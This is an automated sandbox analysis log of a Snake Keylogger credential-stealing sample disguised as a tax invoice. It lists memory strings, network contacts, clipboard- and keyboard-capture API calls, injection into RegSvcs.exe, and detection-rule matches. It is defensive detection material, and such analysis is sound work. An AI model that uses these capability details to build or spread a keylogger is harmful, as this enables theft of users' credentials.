Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.000000000297F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.3702479918.00000000029AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138
Source: RegSvcs.exe, 00000002.00000002.3702479918.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002A19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.00000000029AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138$
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/4
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/8
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E94164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00E94164
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E93F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00E93F66
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_00E8001C
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00EACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00EACABC

System Summary

barindex
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: This is a third-party compiled AutoIt script. 0_2_00E23B3A
Source: (STC) Tax Invoice 25030216_REV.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000000.1225564726.0000000000ED4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_13106f11-f
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000000.1225564726.0000000000ED4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_0971a586-c
Source: (STC) Tax Invoice 25030216_REV.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_631d4ede-7
Source: (STC) Tax Invoice 25030216_REV.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_81616017-c
Source: initial sample Static PE information: Filename: (STC) Tax Invoice 25030216_REV.exe
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00E8A1EF
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E78310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00E78310
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00E851BD
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E2E6A0 0_2_00E2E6A0
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4D975 0_2_00E4D975
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E2FCE0 0_2_00E2FCE0
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E421C5 0_2_00E421C5
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E562D2 0_2_00E562D2
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00EA03DA 0_2_00EA03DA
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E5242E 0_2_00E5242E
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E425FA 0_2_00E425FA
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E366E1 0_2_00E366E1
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E7E616 0_2_00E7E616
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E5878F 0_2_00E5878F
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E88889 0_2_00E88889
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E56844 0_2_00E56844
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00EA0857 0_2_00EA0857
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E38808 0_2_00E38808
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4CB21 0_2_00E4CB21
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E56DB6 0_2_00E56DB6
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E36F9E 0_2_00E36F9E
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E33030 0_2_00E33030
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4F1D9 0_2_00E4F1D9
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E43187 0_2_00E43187
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E21287 0_2_00E21287
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E41484 0_2_00E41484
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E35520 0_2_00E35520
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E47696 0_2_00E47696
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E35760 0_2_00E35760
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E41978 0_2_00E41978
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E59AB5 0_2_00E59AB5
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00EA7DDB 0_2_00EA7DDB
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4BDA6 0_2_00E4BDA6
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E41D90 0_2_00E41D90
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E33FE0 0_2_00E33FE0
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E2DF00 0_2_00E2DF00
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_01663A98 0_2_01663A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BD2C9 2_2_027BD2C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B5378 2_2_027B5378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BC147 2_2_027BC147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BC788 2_2_027BC788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BD599 2_2_027BD599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BCA58 2_2_027BCA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BF804 2_2_027BF804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B69A8 2_2_027B69A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B3E09 2_2_027B3E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BCFF7 2_2_027BCFF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B6FD0 2_2_027B6FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BEC18 2_2_027BEC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BCD28 2_2_027BCD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B9DE0 2_2_027B9DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BFC52 2_2_027BFC52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BEC0A 2_2_027BEC0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054081D0 2_2_054081D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05407B78 2_2_05407B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05408FB0 2_2_05408FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540E540 2_2_0540E540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05400D48 2_2_05400D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540C54F 2_2_0540C54F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540E550 2_2_0540E550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540815A 2_2_0540815A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540A55F 2_2_0540A55F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540C560 2_2_0540C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540A570 2_2_0540A570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540E9D0 2_2_0540E9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540E9E0 2_2_0540E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540C9E0 2_2_0540C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540C9F0 2_2_0540C9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540A9F0 2_2_0540A9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054015F7 2_2_054015F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054015F8 2_2_054015F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540119F 2_2_0540119F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054011A0 2_2_054011A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05400040 2_2_05400040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540BC40 2_2_0540BC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05409C44 2_2_05409C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05409C50 2_2_05409C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540345F 2_2_0540345F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05403460 2_2_05403460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05403007 2_2_05403007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05403008 2_2_05403008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540DC1F 2_2_0540DC1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540FC20 2_2_0540FC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540BC2F 2_2_0540BC2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05406030 2_2_05406030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540DC30 2_2_0540DC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540E0C0 2_2_0540E0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540C0C0 2_2_0540C0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540C0D0 2_2_0540C0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540A0D0 2_2_0540A0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540A0E0 2_2_0540A0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054008F0 2_2_054008F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05406488 2_2_05406488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05400498 2_2_05400498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540E0B0 2_2_0540E0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054038B8 2_2_054038B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05402757 2_2_05402757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05402758 2_2_05402758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05407B77 2_2_05407B77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05402300 2_2_05402300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540F300 2_2_0540F300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540D300 2_2_0540D300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540D310 2_2_0540D310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540B310 2_2_0540B310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05407720 2_2_05407720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540B320 2_2_0540B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05407722 2_2_05407722
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05405328 2_2_05405328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054097C0 2_2_054097C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05405BD8 2_2_05405BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05405780 2_2_05405780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540F781 2_2_0540F781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540F790 2_2_0540F790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540D791 2_2_0540D791
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540D7A0 2_2_0540D7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540B7A0 2_2_0540B7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05408FA1 2_2_05408FA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05402BAF 2_2_05402BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05402BB0 2_2_05402BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540B7B0 2_2_0540B7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054097B0 2_2_054097B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05401A4F 2_2_05401A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05401A50 2_2_05401A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540EE5F 2_2_0540EE5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540CE6F 2_2_0540CE6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05406E70 2_2_05406E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540EE70 2_2_0540EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05404A78 2_2_05404A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540AE7F 2_2_0540AE7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540AA00 2_2_0540AA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05406A18 2_2_05406A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05404620 2_2_05404620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05404622 2_2_05404622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054072C8 2_2_054072C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054072CA 2_2_054072CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05404ED0 2_2_05404ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540F2F0 2_2_0540F2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054022FF 2_2_054022FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540CE80 2_2_0540CE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540AE90 2_2_0540AE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05401EA7 2_2_05401EA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05401EA8 2_2_05401EA8
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: String function: 00E40AE3 appears 70 times
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: String function: 00E27DE1 appears 36 times
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: String function: 00E48900 appears 42 times
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1237139316.0000000003EC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs (STC) Tax Invoice 25030216_REV.exe
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1237661746.000000000406D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs (STC) Tax Invoice 25030216_REV.exe
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAubriella.exe4 vs (STC) Tax Invoice 25030216_REV.exe
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
